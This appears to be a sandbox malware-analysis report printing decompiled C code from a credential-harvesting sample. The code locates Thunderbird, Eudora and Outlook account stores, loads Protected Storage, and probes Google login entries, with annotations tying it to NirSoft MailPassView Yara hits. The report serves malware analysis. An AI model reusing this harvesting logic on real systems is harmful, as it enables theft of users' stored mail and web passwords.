                                                                                                                                                                  				}
                                                                                                                                                                  				_t158 = _t157 + 0x105;
                                                                                                                                                                  				_t71 = strlen("Thunderbird\\Profiles");
                                                                                                                                                                  				_t12 = strlen( &_v540) + 1; // 0x1
                                                                                                                                                                  				if(_t71 + _t12 >= 0x104) {
                                                                                                                                                                  					 *_t158 = 0;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					E004062B7(_t158,  &_v540, "Thunderbird\\Profiles");
                                                                                                                                                                  				}
                                                                                                                                                                  				_t75 = E00406155(_t158);
                                                                                                                                                                  				_pop(_t137);
                                                                                                                                                                  				if(_t75 == 0) {
                                                                                                                                                                  					 *_t158 = _t75;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t160 = _a4 + 0x20a;
                                                                                                                                                                  				_t76 = E00401C56(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
                                                                                                                                                                  				_t173 = _t172 + 0xc;
                                                                                                                                                                  				if(_t76 == 0) {
                                                                                                                                                                  					_t126 = E00401C56(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x41344f); // executed
                                                                                                                                                                  					_t173 = _t173 + 0xc;
                                                                                                                                                                  					if(_t126 == 0) {
                                                                                                                                                                  						 *_t160 = _t126;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				_t78 = E0040F1B0(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
                                                                                                                                                                  				_t174 = _t173 + 0xc;
                                                                                                                                                                  				if(_t78 != 0) {
                                                                                                                                                                  					L32:
                                                                                                                                                                  					_t169 = _a4 + 0x30f;
                                                                                                                                                                  					if( *_t169 != 0) {
                                                                                                                                                                  						L35:
                                                                                                                                                                  						return _t78;
                                                                                                                                                                  					}
                                                                                                                                                                  					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
                                                                                                                                                                  					_t78 = E00406155(_t169);
                                                                                                                                                                  					if(_t78 != 0) {
                                                                                                                                                                  						goto L35;
                                                                                                                                                                  					}
                                                                                                                                                                  					 *_t169 = _t78;
                                                                                                                                                                  					return _t78;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_v796 = _t78;
                                                                                                                                                                  					_t161 = 0;
                                                                                                                                                                  					memset( &_v795, 0, 0xff);
                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                  					_t83 = E0040F276(_v8, 0,  &_v796);
                                                                                                                                                                  					_t175 = _t174 + 0x18;
                                                                                                                                                                  					if(_t83 != 0) {
                                                                                                                                                                  						L31:
                                                                                                                                                                  						_t78 = RegCloseKey(_v8);
                                                                                                                                                                  						goto L32;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t170 = "sqlite3.dll";
                                                                                                                                                                  					do {
                                                                                                                                                                  						_t85 = atoi( &_v796);
                                                                                                                                                                  						_pop(_t139);
                                                                                                                                                                  						if(_t85 < 3) {
                                                                                                                                                                  							goto L28;
                                                                                                                                                                  						}
                                                                                                                                                                  						_v2348 = 0;
                                                                                                                                                                  						memset( &_v2347, _t161, 0x3ff);
                                                                                                                                                                  						_v276 = 0;
                                                                                                                                                                  						memset( &_v275, _t161, 0x104);
                                                                                                                                                                  						sprintf( &_v2348, "%s\\Main",  &_v796);
                                                                                                                                                                  						E0040F232(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
                                                                                                                                                                  						_t175 = _t175 + 0x38;
                                                                                                                                                                  						if(_v276 != 0 && E00406155( &_v276) != 0) {
                                                                                                                                                                  							_v1060 = 0;
                                                                                                                                                                  							memset( &_v1059, _t161, 0x104);
                                                                                                                                                                  							_v1324 = 0;
                                                                                                                                                                  							memset( &_v1323, _t161, 0x104);
                                                                                                                                                                  							_t104 = strlen(_t170);
                                                                                                                                                                  							_t41 = strlen( &_v276) + 1; // 0x1
                                                                                                                                                                  							_t175 = _t175 + 0x20;
                                                                                                                                                                  							if(_t104 + _t41 >= 0x104) {
                                                                                                                                                                  								_v1060 = 0;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								E004062B7( &_v1060,  &_v276, _t170);
                                                                                                                                                                  							}
                                                                                                                                                                  							_t108 = strlen("nss3.dll");
                                                                                                                                                                  							_t47 = strlen( &_v276) + 1; // 0x1
                                                                                                                                                                  							if(_t108 + _t47 >= 0x104) {
                                                                                                                                                                  								_v1324 = 0;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								E004062B7( &_v1324,  &_v276, "nss3.dll");
                                                                                                                                                                  							}
                                                                                                                                                                  							if(E00406155( &_v1060) == 0 || E00406155( &_v1324) == 0) {
                                                                                                                                                                  								_t161 = 0;
                                                                                                                                                                  								goto L28;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								strcpy(_a4 + 0x30f,  &_v276);
                                                                                                                                                                  								goto L31;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  						L28:
                                                                                                                                                                  						_v12 = _v12 + 1;
                                                                                                                                                                  						_t87 = E0040F276(_v8, _v12,  &_v796);
                                                                                                                                                                  						_t175 = _t175 + 0xc;
                                                                                                                                                                  					} while (_t87 == 0);
                                                                                                                                                                  					goto L31;
                                                                                                                                                                  				}
                                                                                                                                                                  			}

                                                                                                                                                                  0x00401e65
                                                                                                                                                                  0x00401e6c
                                                                                                                                                                  0x00401e73
                                                                                                                                                                  0x00401e7a
                                                                                                                                                                  0x00401e85
                                                                                                                                                                  0x00401e98
                                                                                                                                                                  0x00401e9c
                                                                                                                                                                  0x00401ea1
                                                                                                                                                                  0x00401eb9
                                                                                                                                                                  0x00401ebc
                                                                                                                                                                  0x00401ebf
                                                                                                                                                                  0x00401ea3
                                                                                                                                                                  0x00401ea3
                                                                                                                                                                  0x00401eb0
                                                                                                                                                                  0x00401eb6
                                                                                                                                                                  0x00401ec2
                                                                                                                                                                  0x00401eca
                                                                                                                                                                  0x00401ecc
                                                                                                                                                                  0x00401ecc
                                                                                                                                                                  0x00401ed3
                                                                                                                                                                  0x00401ed9
                                                                                                                                                                  0x00401eec
                                                                                                                                                                  0x00401ef4
                                                                                                                                                                  0x00401f0d
                                                                                                                                                                  0x00401ef6
                                                                                                                                                                  0x00401f04
                                                                                                                                                                  0x00401f0a
                                                                                                                                                                  0x00401f11
                                                                                                                                                                  0x00401f18
                                                                                                                                                                  0x00401f19
                                                                                                                                                                  0x00401f1b
                                                                                                                                                                  0x00401f1b
                                                                                                                                                                  0x00401f2a
                                                                                                                                                                  0x00401f35
                                                                                                                                                                  0x00401f3a
                                                                                                                                                                  0x00401f44
                                                                                                                                                                  0x00401f51
                                                                                                                                                                  0x00401f56
                                                                                                                                                                  0x00401f5b
                                                                                                                                                                  0x00401f5d
                                                                                                                                                                  0x00401f5d
                                                                                                                                                                  0x00401f5b
                                                                                                                                                                  0x00401f5f
                                                                                                                                                                  0x00401f6d
                                                                                                                                                                  0x00401f72
                                                                                                                                                                  0x00401f77
                                                                                                                                                                  0x00402168
                                                                                                                                                                  0x0040216b
                                                                                                                                                                  0x00402174
                                                                                                                                                                  0x00402194
                                                                                                                                                                  0x00402194
                                                                                                                                                                  0x00402194
                                                                                                                                                                  0x0040217d
                                                                                                                                                                  0x00402184
                                                                                                                                                                  0x0040218c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040218e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401f7d
                                                                                                                                                                  0x00401f82
                                                                                                                                                                  0x00401f88
                                                                                                                                                                  0x00401f92
                                                                                                                                                                  0x00401fa2
                                                                                                                                                                  0x00401fa5
                                                                                                                                                                  0x00401faa
                                                                                                                                                                  0x00401faf
                                                                                                                                                                  0x0040215f
                                                                                                                                                                  0x00402162
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402162
                                                                                                                                                                  0x00401fb5
                                                                                                                                                                  0x00401fba
                                                                                                                                                                  0x00401fc1
                                                                                                                                                                  0x00401fc9
                                                                                                                                                                  0x00401fca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401fdd
                                                                                                                                                                  0x00401fe4
                                                                                                                                                                  0x00401ff2
                                                                                                                                                                  0x00401ff9
                                                                                                                                                                  0x00402011
                                                                                                                                                                  0x0040202d
                                                                                                                                                                  0x00402032
                                                                                                                                                                  0x0040203c
                                                                                                                                                                  0x00402060
                                                                                                                                                                  0x00402067
                                                                                                                                                                  0x00402075
                                                                                                                                                                  0x0040207c
                                                                                                                                                                  0x00402082
                                                                                                                                                                  0x00402095
                                                                                                                                                                  0x00402099
                                                                                                                                                                  0x0040209e
                                                                                                                                                                  0x004020b7
                                                                                                                                                                  0x004020a0
                                                                                                                                                                  0x004020ae
                                                                                                                                                                  0x004020b4
                                                                                                                                                                  0x004020c3
                                                                                                                                                                  0x004020d6
                                                                                                                                                                  0x004020de
                                                                                                                                                                  0x004020fb
                                                                                                                                                                  0x004020e0
                                                                                                                                                                  0x004020f2
                                                                                                                                                                  0x004020f8
                                                                                                                                                                  0x00402111
                                                                                                                                                                  0x00402124
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402148
                                                                                                                                                                  0x00402158
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040215e
                                                                                                                                                                  0x00402111
                                                                                                                                                                  0x00402126
                                                                                                                                                                  0x00402126
                                                                                                                                                                  0x00402136
                                                                                                                                                                  0x0040213b
                                                                                                                                                                  0x0040213e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402146

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00401E6C
                                                                                                                                                                  • strlen.MSVCRT ref: 00401E85
                                                                                                                                                                  • strlen.MSVCRT ref: 00401E93
                                                                                                                                                                  • strlen.MSVCRT ref: 00401ED9
                                                                                                                                                                  • strlen.MSVCRT ref: 00401EE7
                                                                                                                                                                  • memset.MSVCRT ref: 00401F92
                                                                                                                                                                  • atoi.MSVCRT ref: 00401FC1
                                                                                                                                                                  • memset.MSVCRT ref: 00401FE4
                                                                                                                                                                  • sprintf.MSVCRT ref: 00402011
                                                                                                                                                                    • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                                                                                                                                                                  • memset.MSVCRT ref: 00402067
                                                                                                                                                                  • memset.MSVCRT ref: 0040207C
                                                                                                                                                                  • strlen.MSVCRT ref: 00402082
                                                                                                                                                                  • strlen.MSVCRT ref: 00402090
                                                                                                                                                                  • strlen.MSVCRT ref: 004020C3
                                                                                                                                                                  • strlen.MSVCRT ref: 004020D1
                                                                                                                                                                  • memset.MSVCRT ref: 00401FF9
                                                                                                                                                                    • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
                                                                                                                                                                    • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                                                                                                                                                                  • strcpy.MSVCRT(?,00000000), ref: 00402158
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402162
                                                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040217D
                                                                                                                                                                    • Part of subcall function 00406155: GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
                                                                                                                                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                  • API String ID: 2492260235-4223776976
                                                                                                                                                                  • Opcode ID: 59627f2f584a0fc03280b870890c3a08f891bace1e47a2458c552be32f244d3b
                                                                                                                                                                  • Instruction ID: 6d070b6b648a05e91db5632b048882ca6db18ac9797f22d42d855398ddad24fb
                                                                                                                                                                  • Opcode Fuzzy Hash: 59627f2f584a0fc03280b870890c3a08f891bace1e47a2458c552be32f244d3b
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B91C772804159AEDB21E6958C45FDB7BAD9F18309F1400BBF608F2182EB789BC58B5D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E0040BB8D(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
    char* _v8;
    intOrPtr _v12;
    intOrPtr _v16;
    intOrPtr _v28;
    intOrPtr _v32;
    void* _v304;
    signed int _v308;
    struct HWND__* _v312;
    intOrPtr _v608;
    struct HACCEL__* _v620;
    struct HWND__* _v644;
    char _v900;
    char _v904;
    char _v908;
    struct tagMSG _v936;
    intOrPtr _v940;
    struct HWND__* _v944;
    struct HWND__* _v948;
    char _v956;
    char _v980;
    char _v988;
    void* __ebx;
    void* __edi;
    void* __esi;
    void* _t49;
    void* _t52;
    int _t56;
    int _t58;
    int _t69;
    void* _t73;
    int _t76;
    int _t78;
    struct HWND__* _t79;
    int _t81;
    int _t86;
    int _t87;
    struct HWND__* _t101;

    _t96 = __ecx;
    *0x417b94 = _a4; // first argument is kept globally and reused below as the module handle (EnumResourceTypesA, LoadAcceleratorsA)
    _t49 = E00404841(__ecx);
    if(_t49 != 0) {
        E0040F41D();
        _t52 = E00406A5B( &_v980);
        _t101 = 0;
        _v940 = 0x20;
        _v948 = 0;
        _v936.hwnd = 0;
        _v944 = 0;
        _v936.message = 0;
        E0040B91E(_t52,  &_v900); // executed
        _v8 =  &_v980;
        E00406DF1(__eflags,  &_v980, _a12); // _a12 is split into the argument structure at _v980 (third WinMain argument, i.e. the command line)
        // E00406F65 appears to look a switch up in the parsed arguments and returns < 0 when it is absent.
        // "/savelangfile" and "/deleteregkey" are the command-line switches of the NirSoft password-recovery
        // utilities, consistent with the MailPassView / WebBrowserPassView Yara hits listed in this report.
        _t56 = E00406F65(_v16, "/savelangfile");
        __eflags = _t56;
        if(_t56 < 0) {
            E004083A7(); // executed
            _t58 = E00406F65(_v8, "/deleteregkey");
            __eflags = _t58;
            if(_t58 < 0) {
                // Sentinel check: the global is primed with 0x11223344, then the module's resource types are
                // enumerated with callback E0040F402, which is expected to overwrite the global with 0x4695399a.
                // If the value is unchanged (resources stripped, module not mapped as expected) the tool refuses
                // to run and shows the "Failed to load the executable file !" box below.
                *0x418110 = 0x11223344; // executed
                EnumResourceTypesA( *0x417b94, E0040F402, 0); // executed
                __eflags =  *0x418110 - 0x4695399a;
                if( *0x418110 == 0x4695399a) {
                    // Field at +0x30 of the parsed state: when it is greater than 1, E0040BAB7 first gets a chance
                    // to serve the request without a window (it returns non-zero when it did); otherwise the GUI path at L13 runs.
                    __eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
                    if(__eflags <= 0) {
                        L13:
                        __imp__CoInitialize(_t101);
                        E0040B84C(_t96,  &_v908); // creates the main window stored in _v644
                        __eflags = _v608 - 3;
                        if(_v608 != 3) {
                            _push(5); // SW_SHOW
                        } else {
                            _push(3); // SW_SHOWMAXIMIZED
                        }
                        ShowWindow(_v644, ??); // second argument is the value pushed just above (decompiler could not resolve it)
                        UpdateWindow(_v644);
                        _v620 = LoadAcceleratorsA( *0x417b94, 0x67); // accelerator table resource id 103
                        E0040AEB7( &_v908);
                        // Standard message pump: accelerators first, then IsDialogMessage for the modeless dialog
                        // whose handle is kept at 0x4181ac, then the main window, then Translate/Dispatch.
                        _t69 = GetMessageA( &_v936, _t101, _t101, _t101);
                        __eflags = _t69;
                        if(_t69 == 0) {
                            L24:
                            __imp__CoUninitialize();
                            goto L25;
                        } else {
                            do {
                                _t76 = TranslateAcceleratorA(_v644, _v620,  &_v936);
                                __eflags = _t76;
                                if(_t76 != 0) {
                                    goto L23;
                                }
                                _t79 =  *0x4181ac;
                                __eflags = _t79 - _t101;
                                if(_t79 == _t101) {
                                    L21:
                                    _t81 = IsDialogMessageA(_v644,  &_v936);
                                    __eflags = _t81;
                                    if(_t81 == 0) {
                                        TranslateMessage( &_v936);
                                        DispatchMessageA( &_v936);
                                    }
                                    goto L23;
                                }
                                _t86 = IsDialogMessageA(_t79,  &_v936);
                                __eflags = _t86;
                                if(_t86 != 0) {
                                    goto L23;
                                }
                                goto L21;
                                L23:
                                _t78 = GetMessageA( &_v936, _t101, _t101, _t101);
                                __eflags = _t78;
                            } while (_t78 != 0);
                            goto L24;
                        }
                    }
                    _t87 = E0040BAB7( &_v904, __eflags);
                    __eflags = _t87;
                    if(_t87 == 0) {
                        _t101 = 0;
                        __eflags = 0;
                        goto L13;
                    }
                    // Vtable pointer reset followed by a call: looks like an inlined destructor sequence.
                    _push(_v28);
                    _v904 = 0x41457c;
                    L00412096();
                    __eflags = _v304;
                    if(_v304 != 0) {
                        DeleteObject(_v304);
                        _v308 = _v308 & 0x00000000;
                    }
                    goto L27;
                }
                MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30); // MB_OK | MB_ICONWARNING
                goto L25;
            }
            RegDeleteKeyA(0x80000001, 0x41344f); // /deleteregkey: 0x80000001 is HKEY_CURRENT_USER, 0x41344f the address of the subkey string
            goto L25;
        } else {
            *0x418488 = 0x417b28; // /savelangfile path
            E004084D8();
            L25:
            // Same destructor-like sequence as above (vtable pointer reset, then the call), plus GDI cleanup.
            _push(_v32);
            _v908 = 0x41457c;
            L00412096();
            __eflags = _v308 - _t101;
            if(_v308 != _t101) {
                DeleteObject(_v308);
                _v312 = _t101;
            }
            L27:
            _v908 = 0x41346c;
            E00406A7D( &_v988);
            E00404638( &_v956);
            E00406A7D( &_v988);
            _t73 = 0;
            __eflags = 0;
            goto L28;
        }
    } else {
        _t73 = _t49 + 1; // initialisation in E00404841 failed (returned 0): return 1 without creating a window
        L28:
        return _t73;
    }
}
Instruction addresses of the listing above (decompiler gutter; the per-line alignment was lost in extraction): 0x0040bb8d 0x0040bb9f 0x0040bba4 0x0040bbab 0x0040bbb3 0x0040bbbc 0x0040bbc1 0x0040bbc7 0x0040bbcf 0x0040bbd3 0x0040bbd7 0x0040bbdb 0x0040bbdf 0x0040bbec 0x0040bbf3 0x0040bc04 0x0040bc09 0x0040bc0b 0x0040bc21 0x0040bc32 0x0040bc37 0x0040bc39 0x0040bc5c 0x0040bc66 0x0040bc6c 0x0040bc76 0x0040bc97 0x0040bc9b 0x0040bce9 0x0040bcea
                                                                                                                                                                  0x0040bcf5
                                                                                                                                                                  0x0040bcfa
                                                                                                                                                                  0x0040bd02
                                                                                                                                                                  0x0040bd08
                                                                                                                                                                  0x0040bd04
                                                                                                                                                                  0x0040bd04
                                                                                                                                                                  0x0040bd04
                                                                                                                                                                  0x0040bd11
                                                                                                                                                                  0x0040bd1e
                                                                                                                                                                  0x0040bd32
                                                                                                                                                                  0x0040bd3d
                                                                                                                                                                  0x0040bd50
                                                                                                                                                                  0x0040bd52
                                                                                                                                                                  0x0040bd54
                                                                                                                                                                  0x0040bdc4
                                                                                                                                                                  0x0040bdc4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bd56
                                                                                                                                                                  0x0040bd5c
                                                                                                                                                                  0x0040bd6f
                                                                                                                                                                  0x0040bd75
                                                                                                                                                                  0x0040bd77
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bd79
                                                                                                                                                                  0x0040bd7e
                                                                                                                                                                  0x0040bd80
                                                                                                                                                                  0x0040bd8e
                                                                                                                                                                  0x0040bd9a
                                                                                                                                                                  0x0040bd9c
                                                                                                                                                                  0x0040bd9e
                                                                                                                                                                  0x0040bda5
                                                                                                                                                                  0x0040bdb0
                                                                                                                                                                  0x0040bdb0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bd9e
                                                                                                                                                                  0x0040bd88
                                                                                                                                                                  0x0040bd8a
                                                                                                                                                                  0x0040bd8c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bdb6
                                                                                                                                                                  0x0040bdbe
                                                                                                                                                                  0x0040bdc0
                                                                                                                                                                  0x0040bdc0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bd5c
                                                                                                                                                                  0x0040bd54
                                                                                                                                                                  0x0040bca1
                                                                                                                                                                  0x0040bca6
                                                                                                                                                                  0x0040bca8
                                                                                                                                                                  0x0040bce7
                                                                                                                                                                  0x0040bce7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bce7
                                                                                                                                                                  0x0040bcaa
                                                                                                                                                                  0x0040bcb1
                                                                                                                                                                  0x0040bcb9
                                                                                                                                                                  0x0040bcbe
                                                                                                                                                                  0x0040bcc7
                                                                                                                                                                  0x0040bcd4
                                                                                                                                                                  0x0040bcda
                                                                                                                                                                  0x0040bcda
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bcc7
                                                                                                                                                                  0x0040bc85
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bc85
                                                                                                                                                                  0x0040bc45
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bc0d
                                                                                                                                                                  0x0040bc0d
                                                                                                                                                                  0x0040bc17
                                                                                                                                                                  0x0040bdca
                                                                                                                                                                  0x0040bdca
                                                                                                                                                                  0x0040bdd1
                                                                                                                                                                  0x0040bdd9
                                                                                                                                                                  0x0040bdde
                                                                                                                                                                  0x0040bde6
                                                                                                                                                                  0x0040bdef
                                                                                                                                                                  0x0040bdf5
                                                                                                                                                                  0x0040bdf5
                                                                                                                                                                  0x0040bdfc
                                                                                                                                                                  0x0040be00
                                                                                                                                                                  0x0040be08
                                                                                                                                                                  0x0040be11
                                                                                                                                                                  0x0040be1a
                                                                                                                                                                  0x0040be1f
                                                                                                                                                                  0x0040be1f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040be1f
                                                                                                                                                                  0x0040bbad
                                                                                                                                                                  0x0040bbad
                                                                                                                                                                  0x0040be21
                                                                                                                                                                  0x0040be27
                                                                                                                                                                  0x0040be27

APIs
  • Part of subcall function 00404841: LoadLibraryA.KERNEL32(comctl32.dll,76D24DE0,?,00000000,?,?,?,0040BBA9,76D24DE0), ref: 00404860
  • Part of subcall function 00404841: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404872
  • Part of subcall function 00404841: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040BBA9,76D24DE0), ref: 00404886
  • Part of subcall function 00404841: MessageBoxA.USER32 ref: 004048B1
• ??3@YAXPAX@Z.MSVCRT ref: 0040BDD9
• DeleteObject.GDI32(?), ref: 0040BDEF
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
• String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
• API String ID: 745651260-375988210
• Opcode ID: e1159f30e00c98f05f2d67921a14677ae0d548148ce7ab1f7a7c6c893690e61f
• Instruction ID: 8d811f0c9aed7e5f9a0d70865fafe098279c62815184764300974fb8b6b83255
• Opcode Fuzzy Hash: e1159f30e00c98f05f2d67921a14677ae0d548148ce7ab1f7a7c6c893690e61f
• Instruction Fuzzy Hash: A8618C71508345ABC720AFA1DC49A9BBBF9FF84705F00483FF545A22A0DB789904CB5E
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%
E00403C17(signed int __ecx, void* __eflags, void* __fp0) {
	char _v8;
	void* __edi;
	void* __esi;
	struct HINSTANCE__* _t42;
	void* _t56;
	void* _t58;
	void* _t60;
	void* _t62;
	void* _t64;
	void* _t66;
	char* _t79;
	void* _t82;
	_Unknown_base(*)()* _t93;
	void* _t94;
	void* _t96;
	void* _t104;
	signed int _t106;
	char* _t114;
	_Unknown_base(*)()* _t130;
	void* _t142;

	_t142 = __fp0;
	_t98 = __ecx;
	_push(__ecx);
	_t106 = __ecx;
	_t96 = __ecx + 0x87c;
	 *(_t96 + 0xc) =  *(_t96 + 0xc) & 0x00000000;
	E0040EF05(_t96);
	_t42 = LoadLibraryA("pstorec.dll"); // executed
	 *(_t96 + 8) = _t42;
	if(_t42 == 0) {
		L4:
		E0040EF05(_t96);
	} else {
		_t93 = GetProcAddress(_t42, "PStoreCreateInstance");
		_t130 = _t93;
		_t98 = 0 | _t130 != 0x00000000;
		 *(_t96 + 0x10) = _t93;
		if(_t130 != 0) {
			goto L4;
		} else {
			_t98 = _t96 + 4;
			_t94 =  *_t93(_t96 + 4, 0, 0, 0);
			_t132 = _t94;
			if(_t94 != 0) {
				goto L4;
			} else {
				 *(_t96 + 0xc) = 1;
			}
		}
	}
	E004047AA(_t106 + 0x890, _t132);
	E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com/Please log in to your Gmail account");
	E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com:443/Please log in to your Gmail account");
                                                                                                                                                                  				E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com/Please log in to your Google Account");
                                                                                                                                                                  				E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com:443/Please log in to your Google Account");
                                                                                                                                                                  				_push(_t106 + 0x858); // executed
                                                                                                                                                                  				E004076B7(_t98, _t132); // executed
                                                                                                                                                                  				E00407306(_t98, _t106 + 0x86c); // executed
                                                                                                                                                                  				E004077C5(_t132, _t106 + 0x878); // executed
                                                                                                                                                                  				_t56 = E0040F1B0(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
                                                                                                                                                                  				_t133 = _t56;
                                                                                                                                                                  				if(_t56 == 0) {
                                                                                                                                                                  					E00402B92(_t98,  &_v8, _t133, _t142, _t106, 1);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t58 = E0040F1B0(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
                                                                                                                                                                  				_t134 = _t58;
                                                                                                                                                                  				if(_t58 == 0) {
                                                                                                                                                                  					E00402B92(_t98,  &_v8, _t134, _t142, _t106, 5);
                                                                                                                                                                  				}
                                                                                                                                                                  				E00402C1E(_t98, _t142, _t106); // executed
                                                                                                                                                                  				 *((intOrPtr*)(_t106 + 0xb1c)) = 6;
                                                                                                                                                                  				_t60 = E00406282();
                                                                                                                                                                  				_push( &_v8);
                                                                                                                                                                  				if( *((intOrPtr*)(_t60 + 0x10)) != 1) {
                                                                                                                                                                  					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
                                                                                                                                                                  				}
                                                                                                                                                                  				_push(0x80000001);
                                                                                                                                                                  				_t62 = E0040F1B0();
                                                                                                                                                                  				_t136 = _t62;
                                                                                                                                                                  				if(_t62 != 0) {
                                                                                                                                                                  					 *((char*)(_t106 + 0xa9c)) = 0;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					E00402AE3( &_v8, _t136, _t142, _t106);
                                                                                                                                                                  				}
                                                                                                                                                                  				 *((intOrPtr*)(_t106 + 0xb1c)) = 0xf;
                                                                                                                                                                  				_t64 = E0040F1B0(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
                                                                                                                                                                  				_t137 = _t64;
                                                                                                                                                                  				if(_t64 != 0) {
                                                                                                                                                                  					 *((char*)(_t106 + 0xa9c)) = 0;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					E00402AE3( &_v8, _t137, _t142, _t106);
                                                                                                                                                                  				}
                                                                                                                                                                  				 *((intOrPtr*)(_t106 + 0xb1c)) = 0x10;
                                                                                                                                                                  				_t66 = E0040F1B0(0x80000001, "Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles",  &_v8);
                                                                                                                                                                  				_t138 = _t66;
                                                                                                                                                                  				if(_t66 != 0) {
                                                                                                                                                                  					 *((char*)(_t106 + 0xa9c)) = 0;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					E00402AE3( &_v8, _t138, _t142, _t106);
                                                                                                                                                                  				}
                                                                                                                                                                  				E0040EF1C(_t96);
                                                                                                                                                                  				E004047FB(_t106 + 0x890);
                                                                                                                                                                  				E00402F9C(_t106, _t98, _t142, 0x80000001); // executed
                                                                                                                                                                  				E00402F9C(_t106, _t98, _t142, 0x80000002); // executed
                                                                                                                                                                  				E00403278(_t142, _t106);
                                                                                                                                                                  				E004034A5(_t98, _t138, _t142, _t106); // executed
                                                                                                                                                                  				E00403946(_t138, _t142, _t106); // executed
                                                                                                                                                                  				E0040378B(_t98, _t106, _t142, _t106); // executed
                                                                                                                                                                  				_t79 = _t106 + 0xb20;
